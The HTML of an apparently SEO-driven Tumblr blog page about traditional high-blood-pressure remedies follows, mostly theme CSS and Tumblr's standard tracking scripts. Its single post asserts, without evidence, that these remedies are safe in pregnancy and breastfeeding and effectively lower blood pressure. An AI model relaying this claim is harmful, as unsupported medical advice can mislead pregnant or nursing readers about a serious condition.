<!DOCTYPE html>
<script>var __pbpa = true;</script><script>var translated_warning_string = 'Warning: Never enter your Tumblr password unless \u201chttps://www.tumblr.com/login\u201d\x0ais the address in your web browser.\x0a\x0aYou should also see a green \u201cTumblr, Inc.\u201d identification in the address bar.\x0a\x0aSpammers and other bad guys use fake forms to steal passwords.\x0a\x0aTumblr will never ask you to log in from a user\u2019s blog.\x0a\x0aAre you absolutely sure you want to continue?';</script><script type="text/javascript" language="javascript" src="http://assets.tumblr.com/assets/scripts/pre_tumblelog.js?_v=81465be7ec0ee40855d0652f7673c1c2"></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Minimal Theme designed by Artur Kim (http://arturkim.com) for Tumblr | version 1.5 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# blog: http://ogp.me/ns/blog#">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Obat Penurun Darah Tinggi Tradisional</title>
    <meta name="description" content="Informasi obat penurun darah tinggi tradisional yang aman bagi ibu hamil dan menyusui, juga ampuh menurunkan tekanan darah tinggi secara alami!" />
    <style>figure{margin:0}.tmblr-iframe{position:absolute}.tmblr-iframe.hide{display:none}</style>
    <link rel="alternate" type="application/rss+xml" href="http://obatpenurundarah.dkes.org/rss" />

    <!-- DEFAULT VARIABLES -->
    <meta name="color:Post Type Text" content="#555555"/>
    <meta name="color:Post Type Photo" content="#555555"/>
    <meta name="color:Post Type Photoset" content="#555555"/>
    <meta name="color:Post Type Quote" content="#555555"/>
    <meta name="color:Post Type Link" content="#555555"/>
    <meta name="color:Post Type Chat" content="#555555"/>
    <meta name="color:Post Type Video" content="#555555"/>
    <meta name="color:Post Type Audio" content="#555555"/>
    <meta name="image:Header" content=""/>
    <meta name="if:Show About Widget" content="1"/>
    <meta name="if:Show Stuff I Like Widget" content="1"/>
    <meta name="if:Show Latest Tweets Widget" content="0"/>
    <meta name="if:Show People I Follow Widget" content="1"/>
    <meta name="text:Number of Tweets" content="3"/>
    <meta name="text:Google Analytics ID" content="" />
    <meta name="text:Disqus Shortname" content="" />

    <style type="text/css" media="screen">
    /* Minimal Theme designed by Artur Kim (http://arturkim.com) for Tumblr | version 1.5 */

    /* RESET */
    html, body, div, span, applet, object, iframe,
    h1, h2, h3, h4, h5, h6, p, blockquote, pre,
    a, abbr, acronym, address, big, cite, code,
    del, dfn, em, font, img, ins, kbd, q, s, samp,
    small, strike, strong, sub, sup, tt, var,
    b, u, i, center,
    dl, dt, dd, ol, ul, li,
    fieldset, form, label, legend,
    table, caption, tbody, tfoot, thead, tr, th, td {
        margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent;
    }
    body { line-height: 1; }
    ol, ul { list-style: none; }
    blockquote, q { quotes: none; }
    blockquote:before, blockquote:after, q:before, q:after { content: ''; content: none; }
    :focus { outline: 0; }
    del { text-decoration: line-through; }
    table { border-collapse: collapse; border-spacing: 0; }

    /* GLOBAL ELEMENTS */
    body { background: #fff; }
    body, input, textarea { color: #000; font: 14px/20px "helvetica neue",helvetica,arial,sans-serif; }
    p, ul, ol, dd, pre { margin-bottom: 20px; }
    pre, code { font: 12px Monaco,monospace; line-height: 20px; }
    blockquote { border-left: 5px solid #ddd; color: #555; font-style: italic; margin-bottom: 20px; padding-left: 10px; }
    table { border: 1px solid #ccc; border-width: 1px 1px 0 1px; font-size: 14px; line-height: 20px; margin: 0 0 22px 0; text-align: left; }
    caption { text-align: left; }
    tr { border-bottom: 1px solid #ccc; }
    th, td { padding: .7em 1.25em; }
    hr { background-color: #ccc; border: 0; color: #555; height: 1px; margin-bottom: 20px; }
    a:link, a:visited { color: #555; }
    a:focus, a:hover, a:active { color: #dd3333; }
    h1, h2, h3, h4, h5, h6 {  font-weight:normal; clear:both; }
    img { background: #eee; }
    a img:focus, a img:hover, a img:active { background: #dd3333; }

    /* DEFAULT CSS */
    #header .menu {
        border-bottom: 1px solid #ccc;
        margin: 0 auto 3px;
        overflow: hidden;
        padding: 20px 0 10px;
        width: 900px;
    }
        #header #pages {
            float: left;
            width: 580px;
        }
            #header #pages ul {
                float: left;
                margin-bottom: 0;
            }
                #header #pages li {
                    float: left;
                    margin-right: 10px;
                    padding: 4px 10px 3px 0;
                }
                    #header #pages a, #header #pages a:visited {
                        color: #555;
                        font-size: 16px;
                        text-decoration: none;
                    }
                    #header #pages a:focus, #header #pages a:hover, #header #pages a:active {
                        color: #dd3333;
                    }
        #header #search {
            float: right;
        }
            #header #search input {
                border: 1px solid #ccc;
                line-height: 20px;
                padding: 4px;
            }
            #header #search input.search-button {
                background: #eee;
                color: #555;
                padding: 3px;
                width: 60px;
            }
    #header #branding {
        border-top: 1px solid #ccc;
        border-bottom: 1px solid #ccc;
        margin: 0 auto 3px;
        padding: 40px 0;
        width: 900px;
    }
        #header h1 a {
            color: #111;
            font: 80px Georgia,serif;
            font-weight: normal;
            line-height: 100px;
            text-decoration: none;
        }
        #header h1 a:focus, #header h1 a:hover, #header h1 a:active {
            color: #dd3333;
        }
        #header img {
            max-width: 900px;
        }
    #main {
        border-top: 1px solid #ccc;
        border-bottom: 1px solid #ccc;
        clear: both;
        margin: 0 auto 3px;
        overflow: hidden;
        width: 900px;
    }
        #container {
            border-right: 1px solid #ccc;
            float: left;
            min-height: 400px;
            width: 580px;
        }
            .post-meta {
                border-bottom: 1px solid #ccc;
                color: #555;
                overflow: hidden;
                padding: 9px 0;
            }
                .post-meta .type {
                    float: left;
                }
                    .post-meta .type a {
                        border-bottom: 1px solid #ccc;
                        font-weight: bold;
                        padding: 0 10px 10px;
                        text-decoration: none;
                    }
                    .post-type-text .post-meta .type a {
                        border-bottom: 1px solid #555555;
                        color: #555555;
                    }
                    .post-type-photo .post-meta .type a {
                        border-bottom: 1px solid #555555;
                        color: #555555;
                    }
                    .post-type-photoset .post-meta .type a {
                        border-bottom: 1px solid #555555;
                        color: #555555;
                    }
                    .post-type-quote .post-meta .type a {
                        border-bottom: 1px solid #555555;
                        color: #555555;
                    }
                    .post-type-link .post-meta .type a {
                        border-bottom: 1px solid #555555;
                        color: #555555;
                    }
                    .post-type-chat .post-meta .type a {
                        border-bottom: 1px solid #555555;
                        color: #555555;
                    }
                    .post-type-video .post-meta .type a {
                        border-bottom: 1px solid #555555;
                        color: #555555;
                    }
                    .post-type-audio .post-meta .type a {
                        border-bottom: 1px solid #555555;
                        color: #555555;
                    }
                    .post-meta .type a:focus, .post-meta .type a:hover, .post-meta .type a:active {
                        margin-left: 5px;
                    }
                .post-meta .date, .post-meta .comments, .post-meta .note-count {
                    float: left;
                    padding: 0 10px;
                }
            .post-content {
                padding: 30px 30px 60px;
            }
            .post-content div:last-child, .post-content div:last-child p,
            .post-content div:last-child ul, .post-content div:last-child ol,
            .post-content div:last-child blockquote {
                margin-bottom: 0;
            }
                .post-content h3 {
                    font: 20px Georgia,serif;
                    margin-bottom: 20px;
                }
                    .post-content h3 a, .post-content h3 a:visited {
                        color: #111;
                        text-decoration: none;
                    }
                    .post-content h3 a:focus, .post-content h3 a:hover, .post-content h3:active {
                        color: #dd3333;
                    }
                .post-content img {
                    margin-bottom: 20px;
                    padding: 10px;
                }
                .post-type-text .post-content ul {
                    padding-left: 30px;
                }
                    .post-type-text .post-content ul ul {
                        margin-bottom: 0;
                    }
                    .post-type-text .post-content ul li {
                        list-style-type: disc;
                    }
                        .post-type-text .post-content ul ul li {
                            list-style-type: circle;
                        }
                .post-type-text .post-content ol {
                    padding-left: 30px;
                }
                    .post-type-text .post-content ol ol {
                        margin-bottom: 0;
                    }
                    .post-type-text .post-content ol li {
                        list-style-type: upper-latin;
                    }
                        .post-type-text .post-content ol ol li {
                            list-style-type: lower-latin;
                        }
                .post-type-photoset .post-content .html_photoset {
                    background: #eee;
                    margin-bottom: 20px;
                    padding: 10px;
                }
                .post-type-link .post-content .link-wrap {
                    margin-bottom: 20px;
                }
                .post-type-chat .post-content .label {
                    color: #333;
                    font-weight: bold;
                }
                .post-type-video .post-content .video-wrap {
                    background: #f0f0f0;
                    margin-bottom: 20px;
                    padding: 10px;
                }
                .post-type-audio .post-content .caption {
                    margin-top: 10px;
                }
                .tags {
                    font-size: 13px;
                }
                .tags a {
                    text-decoration: none;
                }
                .tags a:after {
                    content: ",";
                }
                .tags a:last-child:after {
                    content: "";
                }
            #disqus_thread {
                border-top: 1px solid #ccc;
                padding: 10px 30px 0;
            }
                #disqus_thread h3 {
                    color: #111;
                    font: 18px Georgia,serif;
                    margin: 20px 0 10px;
                }
                #dsq-content .dsq-subscribe-menu {
                    font-size: 12px;
                }
            #post-notes {
                border-top: 1px solid #ccc;
                padding: 30px;
            }
                #post-notes ol li {
                    border-bottom: 1px dotted #ccc;
                    padding: 10px 0;
                }
                    #post-notes ol li img {
                        background: none;
                        padding-right: 3px;
                        vertical-align: middle;
                    }
            .pagination {
                border-top: 1px solid #ccc;
                overflow: hidden;
                padding: 20px 0;
            }
                .pagination .previous-page {
                    float: left;
                }
                .pagination .next-page {
                    float: right;
                    margin-right: 30px;
                }
                    .pagination a {
                        font: 20px Georgia,serif;
                        text-decoration: none;
                    }
        #sidebar {
            float: left;
            padding-bottom: 30px;
            width: 319px;
        }
            #sidebar h3 {
                border-bottom: 1px dotted #ccc;
                color: #999;
                font-size: 14px;
                font-weight: bold;
                margin: 0 0 20px;
                padding: 9px 20px;
                text-transform: uppercase;
            }
                #sidebar h3 a, #sidebar h3 a:visited {
                    color: #999;
                    text-decoration: none;
                }
                #sidebar h3 a:focus, #sidebar h3 a:hover, #sidebar h3 a:active {
                    color: #dd3333;
                }

            #sidebar ul {
                margin-bottom: 0;
            }
            .widget {
                border-bottom: 1px solid #ccc;
                color: #333;
                font-size: 13px;
                padding: 0 20px 20px 20px;
            }
                .widget h3 {
                    font: 20px Georgia,serif;
                    margin-bottom: 20px;
                }
                    .widget h3 a, .widget h3 a:visited {
                        color: #000;
                        text-decoration: none;
                    }
                    .widget h3 a:focus, .widget h3 a:hover, .widget h3 a:active {
                        color: #dd3333;
                    }
                .widget img {
                    padding: 5px;
                    max-width: 250px;
                }
                .widget p:last-child, .widget ul:last-child, .widget ol:last-child, .widget blockquote:last-child {
                    margin-bottom: 0;
                }
            #about {
                overflow: hidden;
            }
                #about img {
                    background: #fff;
                    border: 1px solid #ccc;
                    float: left;
                    margin: 0 10px 0 0;
                    padding: 3px;
                }
            .like_post {
                border-bottom: 1px dotted #ccc;
                margin-bottom: 20px;
                padding-bottom: 20px;
            }
            .like_post:last-child {
                border: none;
                margin: 0;
                padding: 0;
            }
                .like_post ul {
                    padding-left: 20px;
                }
                    .like_post ul ul {
                        margin-bottom: 0;
                    }
                    .like_post ul li {
                        list-style-type: disc;
                    }
                        .like_post ul ul li {
                            list-style-type: circle;
                        }
                .like_post ol {
                    padding-left: 20px;
                }
                    .like_post ol ol {
                        margin-bottom: 0;
                    }
                    .like_post ol li {
                        list-style-type: upper-latin;
                    }
                        .like_post ol ol li {
                            list-style-type: lower-latin;
                        }
                .like_post p:last-child, .like_post ul:last-child, .like_post ol:last-child, .like_post blockquote:last-child {
                    margin-bottom: 0;
                }
            #tweets {
                margin-bottom: 10px;
            }
                #tweets .content {
                    margin-bottom: 10px;
                }
                    #tweets a {
                        text-decoration: none;
                    }
            #following_container {
                overflow: hidden;
                padding-bottom: 20px;
            }
                #following_container li {
                    display: inline;
                    padding: 0;
                    margin: 0;
                }
    #footer {
        border-top: 1px solid #ccc;
        clear: both;
        margin: 0 auto;
        overflow: hidden;
        width: 900px;
    }
        #colophon {
            color: #555;
            float: right;
            font-size: 12px;
            padding: 10px 0 20px;
        }
            #footer a {
                border-bottom: 1px dotted #555;
                text-decoration: none;
            }
    
    </style>
<link rel="alternate" href="android-app://com.tumblr/tumblr/x-callback-url/blog?blogName=namawebsite" />
<link rel="alternate" href="ios-app://305343404/tumblr/x-callback-url/blog?blogName=namawebsite" />
<script src="http://assets.tumblr.com/assets/scripts/tumblelog_post_message_queue.js?_v=cf140c0f1704d59bad98d3be7adddfde"></script>

<link rel="stylesheet" type="text/css" href="http://assets.tumblr.com/fonts/gibson/stylesheet.css?v=3">

<!-- BEGIN TUMBLR FACEBOOK OPENGRAPH TAGS --><!-- If you'd like to specify your own Open Graph tags, define the og:url and og:title tags in your theme's HTML. --><!-- Read more: http://ogp.me/ --><meta property="fb:app_id" content="48119224995" /><meta property="og:title" content="Obat Sinusitis &gt;&gt; Obat Sinusitis Anak Dan Dewasa Alami" /><meta property="og:url" content="http://obatpenurundarah.dkes.org/?og=1" /><meta property="og:description" content="" /><meta property="og:type" content="tumblr-feed:tumblelog" /><meta property="og:image" content="http://assets.tumblr.com/images/default_avatar/cone_closed_128.png" /><meta property="al:ios:url" content="tumblr://x-callback-url/blog?blogName=namawebsite" /><meta property="al:ios:app_name" content="Tumblr" /><meta property="al:ios:app_store_id" content="305343404" /><meta property="al:android:url" content="tumblr://x-callback-url/blog?blogName=namawebsite" /><meta property="al:android:app_name" content="Tumblr" /><meta property="al:android:package" content="com.tumblr" /><!-- END TUMBLR FACEBOOK OPENGRAPH TAGS -->


<!-- TWITTER TAGS --><meta charset="utf-8"><meta name="twitter:site" content="tumblr" /><meta name="twitter:card" content="app" /><meta name="twitter:description" content="namawebsite" /><meta name="twitter:title" content="namawebsite" /><meta name="twitter:app:name:iphone" content="Tumblr" /><meta name="twitter:app:name:ipad" content="Tumblr" /><meta name="twitter:app:name:googleplay" content="Tumblr" /><meta name="twitter:app:id:iphone" content="305343404" /><meta name="twitter:app:id:ipad" content="305343404" /><meta name="twitter:app:id:googleplay" content="com.tumblr" /><meta name="twitter:app:url:iphone" content="tumblr://x-callback-url/blog?blogName=namawebsite&amp;referrer=twitter-cards" /><meta name="twitter:app:url:ipad" content="tumblr://x-callback-url/blog?blogName=namawebsite&amp;referrer=twitter-cards" /><meta name="twitter:app:url:googleplay" content="tumblr://x-callback-url/blog?blogName=namawebsite&amp;referrer=twitter-cards" />

<!-- GOOGLE CAROUSEL --><script type="application/ld+json">{"@type":"ItemList","url":"http:\/\/obatpenurundarah.dkes.org","itemListElement":[{"@type":"ListItem","position":1,"url":"http:\/\/obatpenurundarah.dkes.org\/post\/149243598999\/test"}],"@context":"http:\/\/schema.org"}</script>
<link rel="canonical" href="http://obatpenurundarah.dkes.org" />

</head>
<body>
    <div id="wrapper">
        <div id="header">
            <div id="access">
                <div class="menu">
                    <div id="pages">
                        <ul>
                            <li><a href="/">Home</a></li>
                            
                            
                            
                            <li class="archive"><a href="/archive">Archive</a></li>
                            <li class="mobile"><a href="/mobile">Mobile</a></li>
                            <li class="rss"><a href="http://obatpenurundarah.dkes.org/rss">RSS</a></li>
                        </ul>
                    </div><!-- #pages -->
                    <div id="search">
                        <form action="/search" method="get">
                            <input type="text" name="q" value=""/>
                            <input type="submit" value="Search" class="search-button"/>
                        </form>
                    </div><!-- #search -->
                </div><!-- .menu -->
            </div><!-- #access -->
            <div id="branding">
                <h1>
                    
                    <a href="/">Obat Penurun Darah Tinggi Tradisional</a>
                </h1>
            </div><!-- #branding -->
        </div><!-- #header -->
        <div id="main">
            <div id="container">
                <div id="content">
                
                    <div id="post-149243598999" class="post post-type-text">
                        <div class="post-meta">
                            <div class="type">
                                <a href="/">Obat Penururn Darah Tinggi</a>
                            </div><!-- .type -->
                        
                            <div class="date">
                                August 20, 2016
                            </div><!-- .date -->
                        
                        
                        
                        </div><!-- .post-meta -->
                        <div class="post-content">
                        
                            <h3><a href="/">Obat Penururn Darah Tinggi</a></h3>
                            <p>
                            Informasi <a href="http://obatpenurundarah.dkes.org">obat penurun darah tinggi tradisional</a> yang aman bagi ibu hamil dan menyusui, juga ampuh menurunkan tekanan darah tinggi secara alami!
							</p>

                        </div><!-- post-content -->
                    </div><!-- .post -->
                    
                    
                
                
                </div><!-- #content -->
            </div><!-- #container -->
            <div id="sidebar">
            
                <h3>About</h3>
                <div id="about" class="widget">
                </div>
            
			
            
            
            </div><!-- #sidebar -->
        </div><!-- #main -->
        <div id="footer">
            <div id="colophon"><p>Powered by <a href="http://www.tumblr.com/theme/10375">Minimal Theme</a> designed by <a href="http://arturkim.com">Artur Kim</a>.</p></div>
        </div><!-- #footer -->
    </div><!-- #wrapper -->





<iframe scrolling="no" width="1" height="1" frameborder="0" style="background-color:transparent; overflow:hidden; position:absolute; top:0; left:0; z-index:9999;" id="ga_target"></iframe><script type="text/javascript">
    (function(){
        var analytics_frame = document.getElementById('ga_target');
        var analytics_iframe_loaded;
        var user_logged_in;
        var blog_is_nsfw = 'No';
        var addthis_enabled = false;

        var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
        var eventer = window[eventMethod];
        var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message";
        eventer(messageEvent,function(e) {
            var message = (e.data && e.data.split) ? e.data.split(';') : '';
            switch (message[0]) {
                case 'analytics_iframe_loaded':
                    analytics_iframe_loaded = true;
                    postCSMessage();
                    postGAMessage();
                    postATMessage();
                    postRapidMessage();
                    break;
                case 'user_logged_in':
                    user_logged_in = message[1];
                    postGAMessage();
                    postATMessage();
                    break;
            }
        }, false);

        analytics_frame.src = "https://secure.assets.tumblr.com/analytics.html?6e0fdc56f5c8cc16ff619972cbbaf1a2#" +
                              "http://obatpenurundarah.dkes.org";
        function postGAMessage() {
            if (analytics_iframe_loaded && user_logged_in) {
                var is_ajax = false;
                analytics_frame.contentWindow.postMessage(['tick_google_analytics', is_ajax, user_logged_in, blog_is_nsfw, '/?route=%2F'].join(';'), analytics_frame.src.split('/analytics.html')[0]);
            }
        }
        function postCSMessage() {
            COMSCORE = true;
            analytics_frame.contentWindow.postMessage('enable_comscore;' + window.location, analytics_frame.src.split('/analytics.html')[0]);
        }
        function postATMessage() {
            if (addthis_enabled && analytics_iframe_loaded) {
                analytics_frame.contentWindow.postMessage('enable_addthis', analytics_frame.src.split('/analytics.html')[0]);
            }
        }
        function postRapidMessage() {
                            if (analytics_iframe_loaded) {
                    var is_ajax = '';
                    var route = '/';
                    var tumblelog_id = '310335844';
                    var yahoo_space_id = '1197719229';
                    var rapid_client_only = '1';
                    var apv = '1';
                    var rapid_ex = '';

                    analytics_frame.contentWindow.postMessage(
                        [
                            'tick_rapid', is_ajax, route, user_logged_in, tumblelog_id,
                            yahoo_space_id, rapid_client_only, apv, rapid_ex
                        ].join(';'),
                        analytics_frame.src.split('/analytics.html')[0]
                    );
                }
                    }
    })();
</script><script type="text/javascript">!function(s){s.src='https://px.srvcs.tumblr.com/impixu?T=1472123980&J=eyJ0eXBlIjoidXJsIiwidXJsIjoiaHR0cDpcL1wvb2JhdHNpbnVzaXRpc3o3LnR1bWJsci5jb21cLyIsInJlcXR5cGUiOjAsInJvdXRlIjoiXC8ifQ==&U=HAGEJAAOHP&K=4c6635f872cbee34c82996857c9931d44d07d654c2c137461b4b3162c8f00688&R='.replace(/&R=[^&$]*/,'').concat('&R='+escape(document.referrer)).slice(0,2000).replace(/%.?.?$/,'');}(new Image());</script><noscript><img style="position:absolute;z-index:-3334;top:0px;left:0px;visibility:hidden;" src="https://px.srvcs.tumblr.com/impixu?T=1472123980&J=eyJ0eXBlIjoidXJsIiwidXJsIjoiaHR0cDpcL1wvb2JhdHNpbnVzaXRpc3o3LnR1bWJsci5jb21cLyIsInJlcXR5cGUiOjAsInJvdXRlIjoiXC8iLCJub3NjcmlwdCI6MX0=&U=HAGEJAAOHP&K=16ec66033c529ab97dda66643a46c2bb517ea4799c617fdf1842b20d78262d9b&R="></noscript><script >
        (function (w,d) {
            'use strict';
            var l = function(el, type, listener, useCapture) {
                el.addEventListener ?
                el.addEventListener(type, listener, !!useCapture) :
                el.attachEvent && el.attachEvent('on' + type, listener, !!useCapture);
            };
            var a = function () {
                                if (d.getElementById('tumblr-cdx')) {
                    return;
                }
                var s = d.createElement('script');
                var el = d.getElementsByTagName('script')[0];
                s.async = true;
                s.src = 'http://assets.tumblr.com/assets/scripts/vendor/cedexis/cedexis.radar.js?_v=10347cfdbf1a0b22785f026ebcb63e21';
                s.type = 'text/javascript';
                s.id = 'tumblr-cdx';
                d.body.appendChild(s);
            };
            l(w,'load',a);
        }(window, document));
</script>
<script type="text/javascript">!function(s){s.src='https://px.srvcs.tumblr.com/impixu?T=1472123980&J=eyJ0eXBlIjoicG9zdCIsInVybCI6Imh0dHA6XC9cL29iYXRzaW51c2l0aXN6Ny50dW1ibHIuY29tXC8iLCJyZXF0eXBlIjowLCJyb3V0ZSI6IlwvIiwicG9zdHMiOlt7InBvc3RpZCI6IjE0OTI0MzU5ODk5OSIsImJsb2dpZCI6IjMxMDMzNTg0NCIsInNvdXJjZSI6MzN9XX0=&U=ONGKKMJOKC&K=f32d13132f7474f1782de9c6b0606452813721f534ba0cfa8aebf47a5bac048c&R='.replace(/&R=[^&$]*/,'').concat('&R='+escape(document.referrer)).slice(0,2000).replace(/%.?.?$/,'');}(new Image());</script><noscript><img style="position:absolute;z-index:-3334;top:0px;left:0px;visibility:hidden;" src="https://px.srvcs.tumblr.com/impixu?T=1472123980&J=eyJ0eXBlIjoicG9zdCIsInVybCI6Imh0dHA6XC9cL29iYXRzaW51c2l0aXN6Ny50dW1ibHIuY29tXC8iLCJyZXF0eXBlIjowLCJyb3V0ZSI6IlwvIiwicG9zdHMiOlt7InBvc3RpZCI6IjE0OTI0MzU5ODk5OSIsImJsb2dpZCI6IjMxMDMzNTg0NCIsInNvdXJjZSI6MzN9XSwibm9zY3JpcHQiOjF9&U=ONGKKMJOKC&K=66ecca1ef18ad91ff652e9d58418eb456d8db0a38fffc39a9a9055dc012a17e7&R="></noscript>
<noscript id="bootloader" data-bootstrap="{&quot;Components&quot;:{&quot;PostActivity&quot;:[],&quot;TumblelogIframe&quot;:{&quot;unified&quot;:false,&quot;tumblelogBundleSrc&quot;:&quot;http:\/\/assets.tumblr.com\/client\/prod\/standalone\/tumblelog\/index.build.js?_v=b754240effd321494a4cb840633c5e94&quot;,&quot;tumblelogName&quot;:&quot;namawebsite&quot;,&quot;isLoggedIn&quot;:false,&quot;isFriend&quot;:false,&quot;formKey&quot;:&quot;&quot;,&quot;canSubscribe&quot;:false,&quot;isSubscribed&quot;:false,&quot;tumblelogTitle&quot;:&quot;Obat Sinusitis \u003E\u003E Obat Sinusitis Anak Dan Dewasa Alami&quot;,&quot;tumblelogAvatar&quot;:&quot;http:\/\/assets.tumblr.com\/images\/default_avatar\/cone_closed_40.png&quot;,&quot;tumblelogHost&quot;:&quot;http:\/\/obatpenurundarah.dkes.org&quot;,&quot;isOptica&quot;:false,&quot;isCustomTheme&quot;:false,&quot;themeHeaderImage&quot;:&quot;&quot;,&quot;themeBackgroundColor&quot;:&quot;#FAFAFA&quot;,&quot;themeTitleColor&quot;:&quot;#444444&quot;,&quot;themeAccentColor&quot;:&quot;#529ECC&quot;,&quot;brag&quot;:true,&quot;showLrecAds&quot;:false,&quot;showGeminiAds&quot;:false,&quot;geminiSectionCodeDesktop&quot;:&quot;a10bca9c-0c5d-4a02-ab13-14ab8513d81d&quot;,&quot;geminiSectionCodeMobile&quot;:&quot;ced63809-b609-4aca-96a0-abc099acba6b&quot;,&quot;currentPageType&quot;:&quot;blog&quot;,&quot;currentPage&quot;:&quot;1&quot;,&quot;searchQuery&quot;:&quot;&quot;,&quot;tag&quot;:&quot;&quot;,&quot;query&quot;:&quot;&quot;,&quot;chrono&quot;:false,&quot;postId&quot;:&quot;&quot;,&quot;src&quot;:&quot;http:\/\/obatpenurundarah.dkes.org\/&quot;,&quot;postUrl&quot;:&quot;&quot;,&quot;isBlocked&quot;:null,&quot;isAdmin&quot;:false,&quot;lookupButtonUrl&quot;:&quot;&quot;,&quot;showSpamButton&quot;:false,&quot;showRootPostButton&quot;:false,&quot;rootPostUrl&quot;:&quot;&quot;,&quot;showRadarPostButton&quot;:false,&quot;radarKeys&quot;:&quot;&quot;,&quot;isUniblocked&quot;:false,&quot;isNsfw&quot;:false,&quot;isAdult&quot;:false,&quot;isSpam&quot;:false,&quot;isPrimaryBlog&quot;:false,&quot;canEdit&quot;:false,&qquot;canReblogSelf&quot;:false,&quot;showLikeButton&quot;:false,&quot;showReblogButton&quot;:false,&quot;reblogUrl&quot;:&quot;&quot;,&quot;showFanMailButton&quot;:false,&quot;showMessagingButton&quot;:false,&quot;loginCheckIframeSrc&quot;:&quot;http:\/\/assets.tumblr.com\/assets\/html\/iframe\/login_check.html?_v=6a1c5afca919a959f36db36d6487981f&quot;,&quot;appInstallUrl&quot;:&quot;https:\/\/go.onelink.me\/893408789?pid=tumblr_blog_network\u0026c=tumblr_blog_network\u0026af_sub3=blog_name&quot;}},&quot;Flags&quot;:{&quot;doods&quot;:&quot;eyJmaWx0ZXJfbnNmdyI6dHJ1ZSwia2V5Y29tbWFuZF9hdXRvX3BhZ2luYXRlIjp0cnVlLCJsb2dnZWRfb3V0X3NlYXJjaCI6dHJ1ZSwiYXJjaGl2ZS1wbHVzIjp0cnVlLCJzZWN1cmVfZm9ybV9rZXkiOnRydWUsInNlY3VyZV9mb3JtX2tleV9mdWxseV9vbiI6dHJ1ZSwidHVtYmxlbG9nX3BvcG92ZXIiOnRydWUsImNhbm9uaWNhbF91cmxfd3JpdGVzIjp0cnVlLCJlbmFibGVfY2FwdHVyZV9qcyI6dHJ1ZSwicHJpbWFfcG9zdF9mb3JtcyI6dHJ1ZSwibG9ja2VkX3JlYmxvZ191aSI6dHJ1ZSwibG9ja2VkX3JlYmxvZ191aV9wYXJzZV90ZXN0Ijp0cnVlLCJ0YWJsZXRfYmFubmVyX2FjdGl2ZSI6dHJ1ZSwibW9iaWxlX2Jhbm5lcl9hY3RpdmUiOnRydWUsImxvZ19zZWFyY2hfYm94Ijp0cnVlLCJ1c2VyX21lbnRpb25zIjp0cnVlLCJodG1sNV9hdWRpb19wbGF5ZXIiOnRydWUsInBvcG92ZXJfcmVjb21tZW5kYXRpb25zIjp0cnVlLCJpbmRhc2hfcmVjb21tZW5kYXRpb25zIjp0cnVlLCJwb3B0aWNhX3R1bWJsZWxvZ19wb3BvdmVycyI6dHJ1ZSwidHVtYmxyX3R2Ijp0cnVlLCJkZXByZWNhdGVfZmVhdHVyZWRfdGFncyI6dHJ1ZSwicmVibG9nX3VpX3JlZnJlc2giOnRydWUsInRhYl9zd2l0Y2hlciI6dHJ1ZSwiZmFzdF9jb21wb3NlIjp0cnVlLCJkYXNoYm9hcmRfcmVmcmVzaCI6dHJ1ZSwibW9iaWxlX3dlYl9waG90b3NldHMiOnRydWUsIm1vYmlsZV93ZWJfZ2F0ZSI6dHJ1ZSwibW9iaWxlX3dlYl9wYWdlX3RpdGxlcyI6dHJ1ZSwibW9iaWxlX3dlYl9hYnVzZV9mb3JtIjp0cnVlLCJkb250X2Nhc3RfanNfZm9sbG93cyI6dHJ1ZSwiYWRzX25ld192ZW5kb3JfYnV0dG9ucyI6dHJ1ZSwiYmxvY2tfZmVhdHVyZSI6dHJ1ZSwicmVhY3RpdmF0aW9uX2Zsb3ciOnRydWUsImd1bHBqc19hZG1pbiI6dHJ1ZSwiZW5hYmxlX2pzX2Vycm9yc19sb2ciOnRydWUsImVuYWJsZV9qc19lcGhlbWVyYWxfbG9nIjp0cnVlLCJsb2dfbGFkeSI6dHJ1ZSwiY3Nsb2dnZXJfanMiOnRydWUsImRpc2NvdmVyeV9odWJfYWNjZXNzIjp0cnVlLCJoZWFkZXJfYWNjb3VudF9tZW51Ijp0cnVlLCJlbmFibGVfc2hhcmVfZW1iZWRfY29kZSI6dHJ1ZSwicGludGVyZXN0X3NoYXJpbmciOnRydWUsInJlZGRpdF9zaGFyaW5nIjp0cnVlLCJwb3N0X2l0X2ZvcndhcmQiOnRydWUsInBlZXByX3NlYXJjaF9hbmRfZmlsdGVyIjp0cnVlLCJpbnRlcm5zX3BhZ2UiOnRydWUsImZvbGxvd2VkX3NlYXJjaGVzX2JpZ193ZWIiOnRydWUsImRpc2FibGVfcHVibGljX3JlcGxpZXMiOnRydWUsImRlcHJlY2F0ZWRfZm9udHMiOnRydWUsIm5ld19yZXBsaWVzIjp0cnVlLCJyZXBsaWVzX21vZGVyYXRpb24iOnRydWUsImJsb2dfc3ViX29uX2Jsb2dfbmV0d29yayI6dHJ1ZSwibGl2ZXBob3Rvc193ZWIiOnRydWUsIndpZGVfcmlnaHRfY29sdW1uIjp0cnVlLCJkaXNhYmxlX3lhaG9vX2JfY29va2llIjp0cnVlLCJwcmltYV90dW1ibGVsb2dfYnVuZGxlIjp0cnVlLCJsaXZlcGhvdG9zIjp0cnVlfQ==&quot;},&quot;Context&quot;:{&quot;name&quot;:&quot;default&quot;,&quot;time&quot;:1472123980000,&quot;userinfo&quot;:{&quot;primary&quot;:&quot;&quot;,&quot;name&quot;:&quot;&quot;,&quot;channels&quot;:[]},&quot;hosts&quot;:{&quot;assets_host&quot;:&quot;http:\/\/assets.tumblr.com&quot;,&quot;secure_assets_host&quot;:&quot;https:\/\/secure.assets.tumblr.com&quot;,&quot;www_host&quot;:&quot;http:\/\/www.tumblr.com&quot;,&quot;secure_www_host&quot;:&quot;https:\/\/www.tumblr.com&quot;,&quot;embed_host&quot;:&quot;https:\/\/embed.tumblr.com&quot;,&quot;safe_host&quot;:&quot;http:\/\/safe.txmblr.com&quot;,&quot;platform_host&quot;:&quot;http:\/\/platform.tumblr.com&quot;},&quot;language&quot;:&quot;en_US&quot;,&quot;language_simple&quot;:&quot;en&quot;,&quot;assets&quot;:&quot;http:\/\/assets.tumblr.com\/client\/prod\/&quot;},&quot;Translations&quot;:{